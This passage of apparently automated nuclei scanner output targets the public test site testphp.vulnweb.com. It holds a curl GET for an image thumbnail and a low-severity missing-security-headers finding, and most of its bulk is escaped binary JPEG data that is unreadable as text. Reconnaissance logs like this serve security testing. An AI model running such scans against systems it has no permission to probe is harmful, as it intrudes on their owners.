\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\\"\\u003c\\ufffdH\\ufffd\\u000c\\ufffd\\ufffd\\u0000;\\ufffd\\u0015R+.A\\ufffd\\ufffdG.F\\u0018K\\u0003vTڞ\\ufffde\\u0013\\ufffd\\ufffd\\u003e\\u0000\\ufffd\\u0002p\\u0007`\\ufffd_\\ufffd:\\ufffd\\u0018\\u0002\\ufffd\\u00000A\\ufffdދ\\ufffdC\\ufffd\\\\!\\ufffd\\u001eJ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\n\\ufffdH\\ufffdU+Z\\ufffdwQkXBS\\ufffdm\\ufffd\\u0014װ\\ufffd3B\\ufffdȎ\\u0019\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd+J7\\ufffd\\t\\ufffd\\u0000\\ufffdhI\\ufffd\\ufffd\\ufffd\\u0016j\\u0003\\ufffdG΋\\ufffd\\ufffd{C?\\u0018\\ufffd\\u0013`6\\ufffdd\\ufffd\\ufffd3\\ufffd=s\\ufffd\\ufffd`\\ufffd\\ufffd(\\ufffdȟ3\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001b'\\ufffd\\ufffdwཥ\\ufffd\\ufffdW\\u0005\\ufffdM|b\\ufffd\\ufffd\\u001fW\\u0000\\u003cظ\\u0007\\ufffd\\t\\ufffd\\u0015Q\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u001e%?J3\\ufffd\\u000f\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd[\\u000e7\\u000c\\ufffdb\\ufffdօt\\ufffd 3\\ufffd.\\u0006\\ufffd\\ufffd\\ufffd趹\\u001f\\ufffd\\ufffd\\ufffd\\ufffdFYl=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdB\\ufffd\\ufffd\\ufffdYO\\ufffd\\u001f\\ufffd\\ufffd\\ufffdC_:i\\ufffd\\ufffdײ\\ufffd\\ufffdFY,=\\ufffd\\ufffd\\ufffdR\\ufffda\\ufffd\\u000c\\ufffdb\\ufffd\\ufffd\\ufffdYO\\ufffd\\u0012\\ufffd\\u0007\\ufffde@Gq\\ufffdՅ\\ufffd\\u0026G\\ufffd\\ufffd\\ufffd[\\u000fhg\\ufffd\\u0014\\ufffdX{C?\\u0018\\ufffd\\ufffd\\u0019t\\ufffd \\u00118j\\ufffd\\u0012\\ufffd\\u0011\\ufffdjSa;2G\\ufffd\\u0013F\\ufffd,=\\ufffd\\ufffd\\ufffdRɇ\\ufffdC?\\u0018\\ufffd\\ufffd#\\ufffd\\ufffd`8\\ufffdZOe$yԨ\\ufffdRwfO2h\\ufffd%\\ufffd\\ufffd3\\ufffd\\ufffdYp\\ufffd\\u0000hg\\ufffd\\u00147\\ufffd}6\\ufffd\\ufffd\\u0010\\u000c(\\ufffd\\ufffd\\u001esK\\ufffd\\ufffdDe\\u0003\\ufffdQ\\ufffd\\u0016#k\\ufffd~1K\\ufffd^\\ufffd\\ufffd\\ufffd(oE\\ufffd\\ufffd~\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffd\\ufffdOvSL\\u00188V\\ufffd\\u0008O\\ufffd@\\ufffd\\ufffd{K_\\u0018\\ufffdE\\ufffd\\ufffd埌Q\\ufffd1\\ufffdNH\\ufffd\\u001c\\ufffd\\ufffd\\ufffd M\\ufffd\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0013\\ufffd\\ufffd\\ufffd;W$\\ufffdӷ\\ufffd\\r\\ufffd\\rZ\\ufffd$;m\\ufffdc(\\n\\ufffdT\\u0001\\ufffdI\\ufffd4\\ufffd\\ufffd~\\ufffd\\ufffdŅ\\ufffd׽z\\u0016\\ufffd\\u0014 \\u0001\\u0000\\ufffdE\\ufffd$\\ufffdxk\\u001bl8p\\ufffdϨR\\ufffd\\u0008\\ufffd\\u001d-Ŵ;\\ufffd\\ufffd\\ufffdL!\\ufffd\\ufffdV\\u0016\\ufffd\\u0002\\ufffd+\\ufffd\\u0003\\ufffd\\ufffd\\u001f|\\ufffdu\\ufffd\\ufffdb\\u0008k\\ufffd.:\\ufffd\\u0008\\ufffdLƁZ\\ufffdЃ\\ufffdX\\ufffd\\ufffd\\ufffdh/\\ufffd\\ufffd\\ufffd.B\\ufffdeH))!! H\\ufffd!;lg\\ufffd0▪E\\ufffd}P}\\ufffd(\\ufffd\\ufffd\\ufffd)#(%[\\u001d\\ufffd\\ufffd\\ufffdYWQ\\ufffdJ\\ufffd.\\ufffd\\ufffd\\u0000\\ufffd]\\ufffd\\ufffdb/\\u0007\\u0002\\u001cs\\ufffd@P$\\ufffd\\ufffd\\ufffd\\ufffdM\\ufffd\\ufffd\\ufffd\\ufffd\\u0012\\ufffdSM\\ufffd^\\u000e-A\\u0000\\t܉\\ufffdG\\u0018\\ufffd\\u0016\\ufffd\\ufffdo\\u001crԼ\\ufffdE\\ufffdu\\ufffd+*\\ufffd\\ufffd\\ufffd\\u0000F\\ufffd.\\ufffd\\ufffd\\ufffdV\\ufffd\\ufffd˶\\ufffd\\u001a\\ufffd\\ufffd-#+\\ufffd7\\u0004J\\u0013\\ufffda\\u001a\\ufffd \\ufffd\\ufffd\\u0002$M\\tu\\u0019\\ufffd\\ufffd\\ufffd;e\\ufffd\\ufffdYx\\ufffd(\\ufffd6\\u001c\\ufffd!\\u0004\\ufffdY\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffdb\\ufffd\\ufffd\\u000cN\\ufffd\\u0019E\\ufffdn\\ufffd\\ufffd#\\ufffdm\\ufffd\\ufffd9\\ufffd\\ufffd\\ufffdH1\\ufffd\\u001f\\ufffd\\ufffdڠ\\ufffd\\ufffdɈ\\ufffd\\ufffd\\ufffd[j\\u0015\\ufffd!\\ufffd0\\ufffd\\ufffd\\u0003\\u0007\\ufffd\\u0026\\\"\\u000e\\ufffdj)\\ufffd8\\ufffd\\ufffdIq\\ufffdf\\ufffd\\ufffd}\\ufffd\\ufffd\\u0008\\n'|\\ufffd\\ufffd\\ufffd\\ufffdY+7r\\ufffdJ\\u0017\\ufffd7\\ufffdI\\ufffdU~\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdGajȩ\\ufffd\\u003e`x\\ufffd\\ufffdĶ\\ufffd\\ufffd8\\ufffd\\ufffd6\\ufffd]:P\\ufffdFE\\ufffd+*Q\\ufffd\\u0012F\\ufffd\\u00065\\u0010\\ufffdTq\\ufffdC\\u0007yƔ\\ufffd\\ufffd\\u0010\\ufffd\\ufffd\\u0011\\ufffd=\\ufffd\\ufffd\\u0019'\\ufffdy\\ufffdv\\ufffdl\\ufffdp\\ufffd_\\u000cqn+\\ufffd]\\ufffd\\ufffd\\ufffd\\ufffd$q\\u001eQ\\ufffd?\\u001aYW\\ufffd\\ufffd\\ufffd\\ufffd\\u000fd}\\u001a\\ufffd\\ufffdq7\\u0015\\ufffd\\ufffd۔\\ufffd\\ufffd\\u0004\\ufffd\\ufffd\\t\\u0002\\u000f\\u00025\\u001ae\\u001cF\\ufffd\\ufffd\\ufffd8\\ufffd$\\ufffd\\u0016\\ufffd\\ufffd\\\\C\\u0004f\\ufffd\\ufffd2\\ufffd\\u0008\\ufffd\\u001a\\ufffd5\\u0011\\ufffd\\ufffd\\ufffd\\u0002\\ufffd\\ufffdî[\\ufffdKL\\ufffdխh%N\\u0013\\ufffdh\\ufffd\\u0004\\ufffd\\u001c\\u0001\\u0000o:\\ufffdd[\\ufffd]\\ufffdY\\\\\\ufffd\\ufffdбd\\ufffdW(\\u0005\\ufffd\\ufffd\\u0003S\\ufffd\\t\\ufffd\\u0013\\ufffd\\ufffdŨ\\ufffd{\\ufffd\\u0013\\ufffd\\u003cX4\\ufffd\\ufffd1\\u000b\\ufffd\\ufffd,ߘ\\u0004\\ufffd\\ufffd\\ufffd\\u0000\\u0012\\ufffd\\ufffd\\u003c9H\\ufffd\\ufffd4\\ufffdX\\ufffd\\ufffd\\r\\ufffdp]Y\\ufffd\\u0003\\ufffd\\u0000\\u0019\\\"7\\ufffdQ\\ufffd\\u0015\\ufffd/\\ufffdww\\ufffdu,\\\\:۩\\ufffd\\u0008\\ufffd*ˤ\\ufffd7\\u0018\\ufffd\\ufffd\\ufffdo\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd`k\\ufffd\\u001a]\\ufffd\\ufffdmEJ%Dd\\ufffd\\ufffd\\\"gS\\ufffd\\ufffd\\ufffd\\u0013\\ufffd=\\n\\ufffdhe\\ufffd\\ufffd1%J/\\u0016\\u000bn\\ufffdQ\\ufffd۾\\ufffd\\u001fq\\ufffd\\u003cم$\\ufffdj\\ufffd=.\\ufffdR\\ufffd/\\ufffdS\\ufffdhO\\u000e\\ufffd\\u0012\\ufffd$\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdZe'e\\r9@\\ufffd֯\\ufffdݦ'\\ufffd\\ufffd\\ufffd\\u0012P\\u0014\\ufffd\\u001c\\ufffd\\ufffd\\ufffdse\\ufffd\\ufffd\\u0003A\\ufffd\\ufffdjZ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd-4\\ufffd\\u0000Y\\u001bk\\ufffd\\ufffd\\ufffd\\u0000\\ufffdr\\ufffdTBGorv\\u001bӏK\\ufffd\\ufffd\\ufffd}I\\u0003i\\\\\\ufffd\\ufffd7\\ufffd\\ufffd0\\ufffd\\ufffd\\ufffdT\\ufffd\\u00044\\ufffdk\\ufffd\\u001d\\ufffd$\\ufffd\\ufffd;N\\u0013vm\\u0014\\ufffd\\ufffd\\ufffdܘ\\ufffdGw\\u0012|\\u0006\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0005\\ufffd\\n\\ufffd.\\ufffdp\\ufffdt\\ufffd\\ufffd\\ufffd\\ufffdr\\ufffd皤\\u001d0\\ufffd*\\ufffd\\ufffd\\ufffd\\u001d\\ufffdSC\\u0016WV\\ufffdo\\ufffd9\\ufffd|\\ufffd\\ufffdC\\ufffd\\ufffd\\ufffdJ\\ufffd\\ufffd\\ufffdC\\\"4\\ufffd\\ufffd\\ufffd\\u0013R\\ufffdv\\ufffd.\\ufffd\\ufffd\\u0019\\ufffd\\u001bG\\ufffd\\ufffdVHL\\u0002\\u0006i\\ufffd\\u0006\\ufffd\\ufffd\\ufffd\\ufffdޒ]B\\nV\\ufffd\\u0019i\\ufffdl\\ufffdβ\\ufffdF\\u0012\\u001ce\\ufffd\\ufffd\\ufffdЌ\\ufffd@\\u000e\\ufffd\\u003e\\u0014\\ufffd\\ufffd\\u0016\\ufffdYԄ\\ufffdⳒN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd\\u0016\\ufffdu\\ufffd\\ufffd\\ufffd\\u0010BB\\ufffd\\u001c\\ufffdT\\ufffd\\ufffd\\ufffd\\u001c7\\ufffd4.\\ufffd\\ufffd\\ufffd\\ufffdx\\ufffd(\\ufffdV\\u0008B3\\ufffd\\ufffd6\\ufffdغ\\ufffd\\ufffd/\\ufffd\\u0012îu\\ufffd\\ufffd$\\ufffdW]@\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\u0016\\ufffda͵\\ufffd4\\u0014\\u001a\\ufffd\\u001ey\\ufffd\\n@\\ufffd'\\ufffd\\ufffd\\u000c\\ufffd\\u0004F\\ufffd\\ufffd\\u000e\\u001a\\ufffd{\\ufffd\\ufffd\\ufffdܦ\\ufffd(\\ufffd\\ufffdFl\\ufffd\\ufffd\\ufffd*ݻ*\\ufffd\\ufffdT\\u0014\\ufffd\\ufffd\\ufffd\\ufffdQ\\ufffd*\\u0007\\ufffd\\u0006i\\ufffd\\\"\\ufffd\\ufffd\\ufffd\\u0010\\ufffdt\\ufffd\\ufffd\\ufffd!qw\\ufffd\\ufffdݷ\\ufffd\\u003e\\ufffd\\t\\ufffdcI\\u0011\\ufffd\\ufffdY\\ufffd[\\u00168\\ufffd\\ufffd-\\u0015t\\ufffd\\u003e\\ufffd\\ufffdP\\ufffdҳ\\u0015\\u0026`(\\ufffd\\u001a\\ufffd\\ufffdüP-\\ufffd\\ufffd\\ufffd1\\ufffd\\ufffdH\\u001dA=\\ufffd\\ufffdӕ\\u0016٭\\ufffdp\\ufffdmՙ\\ufffdtR\\u0002\\ufffd\\ufffd\\ufffd\\u000f\\ufffdw\\ufffd\\ufffd\\ufffd8G)\\u0007\\ufffdK\\ufffd]N4\\ufffdWn\\ufffd\\u0010\\ufffd\\u0003,\\ufffd\\u000cs\\u0007]\\ufffd3\\\"^HPK\\ufffdF\\ufffdH\\u001a\\ufffdp\\ufffdoDNa]K\\ufffd2\\ufffd\\ufffdHP\\u0008\\ufffd\\ufffdy\\ufffd}\\ufffd\\ufffdU\\ufffd,57=Z\\ufffdn\\ufffd\\ufffd1\\u0019c\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdU\\ufffd\\u0016\\u0001c\\n͉\\ufffd\\u0016\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd\\u0008\\ufffd\\ufffdJں\\ufffd\\ufffdj\\ufffd\\ufffd\\ufffd\\u000e\\ufffd\\ufffdB\\u000bn%3\\u0005\\u0000\\ufffdF\\ufffd{ֵ\\ufffd\\u001bl\\u0008B\\u0019lI\\ufffd\\ufffd))H\\ufffd\\ufffd\\u0003a\\ufffd\\u001d\\ufffd\\ufffdS\\\\\\ufffdn\\u001dYm$+)\\ufffd刐 \\ufffd\\u000c\\r\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdu'\\ufffd\\ufffd0\\ufffd\\ufffdҜ\\ufffdi!JP\\ufffd,L\\ufffd\\u0001\\u001aL\\ufffd\\ufffd\\u001fJ\\ufffd|\\ufffd,p\\ufffdKRB^t\\u0005\\ufffd\\u0000\\ufffd\\ufffd\\ufffdh;\\ufffdj\\ufffdͲ\\ufffdԧs\\ufffd\\ufffdH\\ufffdV\\ufffd\\ufffdm\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdC8\\ufffd,\\ufffd!\\ufffd\\ufffd\\ufffd;\\ufffdbg:\\ufffd\\u0004\\ufffd5\\ufffd\\u0018\\u001a\\ufffd\\ufffd.\\ufffd\\u001e\\ufffd\\ufffd\\ufffd\\ufffd[\\ufffd\\u0002oqE\\ufffd\\u0013n\\ufffd\\ufffdR\\u001a \\ufffd\\u0002x}k\\ufffdz\\u0011\\ufffd3\\ufffd\\ufffd\\nn\\ufffd\\ufffd9n\\u0002V\\ufffd$\\ufffd\\ufffd\\ufffdQ׈\\u0002I܃\\ufffdy\\u0026 \\ufffd\\\\\\ufffdT\\ufffd\\ufffdF\\ufffdL@\\u001e\\u0002\\ufffd\\ufffd\\ufffd^\\u001e\\ufffdk\\ufffdu\\ufffd\\ufffd\\ufffdD\\u0018\\ufffd\\ufffd+\\ufffd^\\ufffd\\ufffd\\u0004\\ufffd\\u0019\\u0013\\ufffdY\\ufffd\\u0015\\ufffd\\ufffd\\u001b[莩\\ufffdħi\\ufffd\\u000f\\ufffd:\\ufffd\\ufffd\\ufffdc\\ufffd\\u003c\\u000b\\ufffd6\\u0014d\\ufffd*$\\ufffd\\ufffd\\ufffd\\ufffdL\\ufffd\\ufffd]\\ufffd\\tm\\ufffd\\ufffd\\ufffd\\ufffd\\u0002\\u000e\\ufffdR\\ufffd\\ufffdb\\ufffd\\ufffd\\ufffd)\\u0026 \\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdq\\ufffd@\\ufffd\\ufffd]\\ufffd\\ufffd\\ufffdU\\ufffd\\ufffd2r\\ufffd)L\\ufffd\\u0000\\ufffd\\u0000\\ufffd\\ufffd\\ufffd,=\\ufffdш\\u000b\\ufffd”\\ufffd܅(\\t\\ufffd\\ufffd\\u0015\\ufffd\\u0004\\ufffd?:1w\\u0017\\ufffd\\ufffdZP\\ufffd\\ufffd%\\t\\ufffd`(\\ufffd\\ufffd\\ufffdD\\ufffd\\ufffd.\\ufffd \\ufffdq\\ufffd\\ufffd\\u0000!\\ufffd\\ufffdQ\\ufffd\\ufffd\\ufffdY\\ufffdw+\\ufffd\\ufffd\\u0012\\ufffd,)X\\ufffda`6\\ufffd\\u0018\\ufffd\\ufffd*x\\ufffd1\\u0014K\\ufffdZ\\ufffd\\ufffd\\u0007\\ufffdz\\ufffd,\\ufffd\\ufffdHS\\u0004\\ufffd)\\u0006\\u000c\\ufffdG\\u0001 \\ufffd\\ufffd\\ufffd\\u0018\\ufffd\\ufffdıD\\ufffd\\ufffd\\ufffd*ԭZ\\u00007\\ufffd\\ufffd\\u0015\\ufffd\\ufffd\\\\=\\t’\\ufffdR-\\ufffd\\ufffd\\ufffd\\u0010]\\ufffdh\\ufffd\\ufffd]~T\\ufffd\\ufffde(Ő\\u0005\\ufffdp\\ufffd\\ufffd\\ufffd\\u0004\\u0003\\ufffd\\u001a\\ufffd*+2kZ\\ufffd\\u0015Z\\u0000D\\u0014\\u0008\\ufffdYB9V\\ufffdp\\u0002L\\ufffdԤ\\ufffd\\ufffdIWn\\ufffd\\ufffd\\u0016\\ufffd\\ufffdm\\u0026@\\ufffd\\ufffdL\\ufffd37\\u001a\\ufffd\\ufffdRX)YЂ)\\ufffd\\ufffd \\tN\\u001eop\\ufffd/\\ufffdR\\ufffd\\ufffd\\u000eGF\\ufffdDhF\\ufffd6:\\ufffdM2ѻ\\ufffd[\\ufffd\\ufffd\\u0001SZ\\u0012\\ufffdǺ\\ufffdC\\ufffdAkv\\ufffd\\ufffdQ\\r\\ufffd\\u0018:\\ufffdH\\ufffd\\ufffdD*]\\ufffdU\\ufffdH\\n\\ufffdII\\u0013\\u001bH\\u001e\\u0015\\ufffdnQn-`(\\ufffd\\ufffd\\ufffd\\ufffdG\\u0010\\ufffd\\u0013\\ufffdv\\ufffd\\ufffd\\u000e\\ufffd\\ufffd\\ufffd\\ufffd5a\\u0017\\ufffdD\\ufffd\\ufffd\\u0000\\ufffd\\ufffdu\\ufffd\\ufffd\\ufffdx\\ufffd\\u0008y\\ufffd\\ufffd\\ufffd\\u0000\\u0002#\\ufffd\\ufffd\\u001bT\\ufffd\\ufffdJ\\ufffdz\\ufffd\\u0007Q\\ufffd\\ufffdc_\\ufffdY%L(%o\\u0010hu\\ufffd7\\tZb\\u0012\\ufffd\\\"u\\ufffd\\ufffdH\\ufffdTn\\\\\\ufffdܽVT\\u0015+\\ufffd\\n\\ufffd\\u0012\\u000e\\ufffd\\ufffdX\\ufffd踸jє\\ufffd\\u001a\\ufffd~\\ufffd뫺ZD\\ufffd\\ufffd\\ufffdc0\\u0004\\u001f\\ufffdW\\ufffdd.\\ufffd\\ufffdIq3m`\\ufffd\\ufffdc9\\u0019\\u001bo\\ufffd\\ufffdY\\u003eC\\ufffd\\ufffd\\ufffd-\\ufffd%\\ufffd\\ufffd\\ufffdd\\ufffd\\ufffd\\ufffd\\ufffd'X'\\ufffdO\\ufffd\\ufffd[\\ufffd\\ufffdn\\ufffdajNl\\ufffd\\ufffd\\u0001\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdf\\ufffd:V\\ufffd\\ufffdʄ'a\\ufffdkm$\\ufffd\\u001e\\ufffd\\ufffdS\\u0002\\ufffdy\\ufffd\\u0015\\u0003A\\ufffd_€a\\ufffd.\\ufffd\\u0001\\ufffd!#\\ufffd\\ufffd\\ufffdJ\\ufffdI\\ufffdN\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdg \\ufffdGuk\\ufffdq`\\u0010\\ufffd\\ufffd-\\ufffd/1\\n'y\\ufffd\\ufffd/4\\ufffd25\\u0006x\\ufffd\\u0014\\ufffd\\ufffd\\u0010u\\ufffd\\u001ba\\ufffd`%:\\ufffdG\\u00045\\ufffd3j\\ufffd\\ufffdH8\\ufffd\\ufffd\\u0004\\ufffd\\u0000\\ufffdPU\\ufffd'¶1|=~\\ufffd\\ufffd[Z\\u0003-\\ufffd\\ufffd\\ufffd:\\ufffdy\\ufffd\\ufffd\\ufffd\\u001d\\u0012e-\\u0002\\ufffd$\\ufffd\\ufffd \\rD\\ufffdυ[\\ufffdR\\ufffdc\\r-)!\\u000f9\\ufffdW08\\u0008\\ufffd|\\ufffd\\u0014\\ufffd7VȄX\\u0026(ղ\\ufffds\\u0002\\u0008%*\\ufffd\\u001fޝ\\ufffd\\\\e\\u0018\\ufffd\\ufffdWn\\ufffd\\ufffd\\ufffdO\\u003e:\\ufffd\\ufffd\\ufffd\\u0026\\ufffd\\n\\u001c$fȭ\\ufffd\\ufffd@\\ufffd\\u0002\\ufffd (F\\ufffd)\\ufffd˽Ir\\u0017$\\ufffd٣qg\\n\\ufffd\\ufffd\\u0019\\ufffd\\u001b\\ufffd\\ufffd\\ufffd\\ufffd\\u0000T\\ufffd\\u000c\\u001f\\ufffd\\u001c\\ufffd6\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd(\\ufffd\\ufffd'.i\\ufffd׉\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdʙ\\ufffd;q\\ufffd\\ufffdS\\ufffd\\ufffd\\ufffdFRM\\ufffdJ\\ufffdR\\t\\ufffd\\u001b\\ufffd\\u001fÊ\\ufffd*\\u0000\\ufffd\\ufffd\\ufffd0EJ\\ufffd\\ufffd\\u0000\\ufffd\\ufffd \\u000eU\\ufffd\\u0002\\ufffd\\tY\\ufffd䟥[w\\ufffd\\n\\ufffd\\u0000Ӑ\\ufffdP\\ufffd\\ufffdW\\t5\\ufffd\\ufffd6\\ufffd\\u0001eAGI\\u001a\\u0011\\ufffdUD)eq$\\ufffdw\\ufffd|\\ufffdVR\\u0012\\ufffd\\u0008\\ufffdt\\\"L\\ufffdƄ\\ufffd\\ufffd\\t\\ufffdڛ\\ufffd\\ufffdL\\ufffds\\u001e4\\ufffd|\\ufffd\\ufffd\\u0001\\u0000\\u0001\\ufffd\\u0001\\ufffd\\ufffd\\ufffdJ\\ufffd2\\ufffdG7*\\ufffd\\ufffd\\ufffd\\ufffd\\u0026\\u000e\\ufffd\\nT\\ufffd\\ufffd\\u003c\\u0012\\ufffd\\ufffd\\ufffd\\ufffdvaCj\\ufffd\\ufffd\\ufffd\\ufffd*p\\ufffd\\ufffd\\u001b\\ufffd#\\ufffdTEڒ\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdM\\u000f=\\ufffdB\\ufffd'bi\\ufffd)?\\u00029\\ufffdy-\\ufffd.V\\ufffd\\ufffd\\ufffd\\u0004\\ufffd́\\ufffd\\ufffd\\ufffd]\\ufffd:\\ufffd\\u0015\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffd\\ufffdrgi֚\\ufffd\\u001f\\ufffd\\ufffdU\\ufffd\\ufffd:xҚ\\u0007\\ufffd\\u0012\\ufffdp\\ufffdУ\\ufffdS\\ufffd\\rj\\ufffdM\\ufffd\\ufffd\\ufffd\\u0006\\ufffdx\\u0011\\ufffdR\\ufffdO\\ufffduQ\\u003c\\ufffdY\\ufffd\\u0014\\ufffd\\ufffdJ\\ufffdO}3\\ufffdQ\\ufffd懲\\u0015\\ufffdҖ\\u0000H\\u0003\\ufffd\\ufffdL٥e!*\\ufffdxD\\ufffda\\t#:\\t\\ufffd\\ufffd\\ufffdJ\\ufffd\\u0010\\ufffd\\ufffd\\u001c\\ufffd\\ufffd\\u0026*\\ufffd)\\\"\\ufffd(ˆ\\u0014aL\\u000b\\u001bR\\ufffd\\ufffd\\u001a\\ufffd\\u0010A(\\u003cx\\ufffd\\ufffdP\\ufffdJ\\ufffdUqrd\\ufffd5#6\\ufffd'\\ufffdZ\\r::\\ufffd\\ufffd\\u0010L\\ufffdsN\\ufffd\\ufffd\\ufffd\\\"\\ufffd\\ufffdw\\ufffd\\ufffd²z\\ufffdm*\\ufffd4\\ufffd\\u00007\\u0026\\u0016gp5=\\ufffd\\ufffdR\\ufffd\\ufffd*A\\ufffdP\\ufffd\\ufffd\\ufffd\\ufffdh\\ufffd\\ufffdي\\ufffdՙ\\ufffd*%i@$\\ufffd`i\\ufffdk!\\ufffd!S\\u001a\\ufffd|\\ufffdҥ\\\\\\ufffd\\u000e\\ufffd\\ufffd$\\u0014\\ufffd\\u0002t\\ufffdj\\u00022\\ufffd@m R\\ufffdW\\ufffd1f̤\\ufffd\\ufffd\\u0000\\ufffd\\ufffd\\ufffd\\u0017\\ufffd\\u0012\\ufffd\\ufffdp\\ufffd\\ufffdJ\\ufffd\\u0008Ե(\\ufffdcz\\ufffd\\ufffd\\ufffd\\ufffd\\ufffd\\ufffdiR\\ufffdPV\\ufffd\\u000c\\ufffdy%m\\ufffd\\ufffd\\ufffd\\u001fqS%\\u00031\\u001e?*T\\ufffd\\u003eE\\u0011\\u00039\\u0011\\ufffd\\u003e\\ufffdj\\ufffd\\t\\ufffd\\u003e\\ufffdR\\ufffdQ\\u0001\\ufffdN\\ufffd\\u0014\\ufffdz\\ufffd@ޕ*Ҹ2ˑ\\ufffd\\u00026\\u001bTKBH:R\\ufffdQ\\ufffd\\u001c[I))\\u0012\\u0007q\\ufffdLI\\u0001\\u000f\\u00109q\\ufffdJ\\ufffd\\ufffd\\ufffdj\\ufffd\\ufffd4\\ufffd\\ufffd\\ufffdP\\ufffd\\ufffd\\\\P\\u0011=\\ufffd\\ufffdUf\\ufffd\\ufffd\\ufffd\",\"ip\":\"44.228.249.3\",\"timestamp\":\"2024-11-13T02:42:29.984823878Z\",\"curl-command\":\"curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15' 'http://testphp.vulnweb.com/pictures/8.jpg.tn'\",\"matcher-status\":true}\n{\"template\":\"http/misconfiguration/http-missing-security-headers.yaml\",\"template-url\":\"https://cloud.projectdiscovery.io/public/http-missing-security-headers\",\"template-id\":\"http-missing-security-headers\",\"template-path\":\"/home/rengine/nuclei-templates/http/misconfiguration/http-missing-security-headers.yaml\",\"info\":{\"name\":\"HTTP Missing Security Headers\",\"author\":[\"socketz\",\"geeknik\",\"g4l1t0\",\"convisoappsec\",\"kurohost\",\"dawid-czarnecki\",\"forgedhallpass\",\"jub0bs\",\"userdehghani\"],\"tags\":[\"misconfig\",\"headers\",\"generic\"],\"description\":\"This template searches for missing HTTP security headers. The impact of these missing headers can vary.\\n\",\"severity\":\"info\",\"metadata\":{\"max-request\":1}},\"matcher-name\":\"x-content-type-options\",\"type\":\"http\",\"host\":\"testphp.vulnweb.com\",\"port\":\"80\",\"scheme\":\"http\",\"url\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"path\":\"/pictures/5.jpg.tn\",\"matched-at\":\"http://testphp.vulnweb.com/pictures/5.jpg.tn\",\"request\":\"GET /pictures/5.jpg.tn HTTP/1.1\\r\\nHost: testphp.vulnweb.com\\r\\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36 Edg/105.0.1343.50\\r\\nConnection: close\\r\\nAccept: */*\\r\\nAccept-Language: en\\r\\nAccept-Encoding: gzip\\r\\n\\r\\n\",\"response\":\"HTTP/1.1 200 OK\\r\\nConnection: close\\r\\nContent-Length: 4428\\r\\nAccept-Ranges: bytes\\r\\nContent-Type: application/octet-stream\\r\\nDate: Wed, 13 Nov 2024 02:42:12 GMT\\r\\nEtag: \\\"4dca64a1-114c\\\"\\r\\nLast-Modified: Wed, 11 May 2011 10:27:45 GMT\\r\\nServer: nginx/1.19.0\\r\\n\\r\\n\\ufffd\\ufffd\\ufffd\\ufffd\\u0000\\u0010JFIF\\u0000\\u0001\\u0001\\u0000\\u0000\\u0001\\u0000\\u0001\\u0000\\u0000\\ufffd\\ufffd\\u0000C\\u0000\\u0006\\u0004\\u0005\\u0006\\u0005\\u0004\\u0006\\u0006\\u0005\\u0006\\u0007\\u0007\\u0006\\u0008\\n\\u0010\\n\\n\\t\\t\\n\\u0014\\u000e\\u000f\\u000c\\u0010\\u0017\\u0014\\u0018\\u0018\\u0017\\u0014\\u0016\\u0016\\u001a\\u001d%\\u001f\\u001a\\u001b#\\u001c\\u0016\\u0016 , #\\u0026')*)\\u0019\\u001f-0-(0%()(\\ufffd\\ufffd\\u0000C\\u0001\\u0007\\u0007\\u0007\\n\\u0008\\n\\u0013\\n\\n\\u0013(\\u001a\\u0016\\u001a((((((((((((((((((((((((((((((((((((((((((((((((((\\ufffd\\ufffd\\u0000\\u0011\\u0008\\u0000d\\u0000\\ufffd\\u0003\\u0001\\\"\\u0000\\u0002\\u0011\\u0001\\u0003\\u0011\\u0001\\ufffd\\ufffd\\u0000\\u001b\\u0000\\u0000\\u0002\\u0003\\u0001\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0004\\u0002\\u0003\\u0005\\u0001\\u0007\\u0006\\ufffd\\ufffd\\u00002\\u0010\\u0000\\u0002\\u0002\\u0001\\u0003\\u0003\\u0002\\u0004\\u0006\\u0002\\u0002\\u0003\\u0001\\u0000\\u0000\\u0000\\u0001\\u0002\\u0003\\u0011\\u0000\\u0004\\u0012!1AQ\\u0013\\\"\\u00052aq\\u0006\\u0014#B\\ufffd\\ufffd\\ufffd\\ufffdR\\ufffd\\u0015b\\ufffdr\\ufffd\\ufffd\\u0000\\u001b\\u0001\\u0000\\u0001\\u0005\\u0001\\u0001\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u0000\\u